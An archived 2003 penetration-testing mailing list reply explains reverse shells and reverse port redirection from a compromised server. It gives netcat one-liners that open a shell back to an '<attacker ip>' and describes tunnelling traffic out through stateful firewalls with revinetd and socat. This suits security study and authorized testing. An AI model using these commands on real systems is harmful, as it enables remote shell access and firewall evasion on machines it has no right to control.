Hosting Provided By

RE: command-line reverse connection tunnel?

From: Steven Gill <gman1120(at)hotmail.com>
Date: Sun Mar 16 2003 - 22:26:33 EST

Yes, you can use netcat to send a shell back, but it is a pain to use it for port redirection. E.G. for a shell you can:

nc -l -p <port> -e /bin/sh

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and stdout connected to the above ports respectively. But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols.

Lets take for example a service on a machine that is not nat'd but a border server we can compromise has access to it.

You can use rinetd, fpipe, stunnel, etc for forward redirection. In these cases, there needs to be 2 holes punched through on the server, 1 for the shell used to compromised the server (like www or telnet) and then the port for the redirector to listen on. Revinetd is used for port redirection where the server appears to be the initiator of the connectivity. You theoretically only need one port open in the forward direction which is the shell. All other connectivity is intiated outbound from the server, so a stateful firewall would see the port redirector traffic as NEW in the connection table from the server, allowing us to utilize more liberal rule sets that we know most organizations allow.

Now I know revinetd is not the only thing to use for it. It was brought to my attention that socat can be used for this, but I wanted a tool that was just used for reverse port forwarding and was intuitive to use.

I hope this answers your question.

Do you need help?

Steve

>From: "Filip Maertens" <filip@securax.be>
>To: "'Steven Gill'" <gman1120@hotmail.com>,<pen-test@securityfocus.com>
>Subject: RE: command-line reverse connection tunnel?
>Date: Sat, 15 Mar 2003 23:57:32 +0100
>
> >have successfully tested it in a pen test stituation in the lab for

MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. http://join.msn.com/?page=features/virus

Did you know that you have VNC running on your network? Your hacker does. Plug your security holes now! Download a free 15-day trial of VAM:
http://www2.stillsecure.com/download/sf_vuln_list.html Received on Mon Mar 17 11:34:48 2003

This message: [ Message body ]
Next message: fr0stman: "IIS 5.0 problem with "backup" files in executable directories....how to enumerate them?"
Previous message: patrick mooting: "Pen testing X.25 networks"
Maybe in reply to: Nick Jacobsen: "command-line reverse connection tunnel?"
In reply to Filip Maertens: "RE: command-line reverse connection tunnel?"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:34 EDT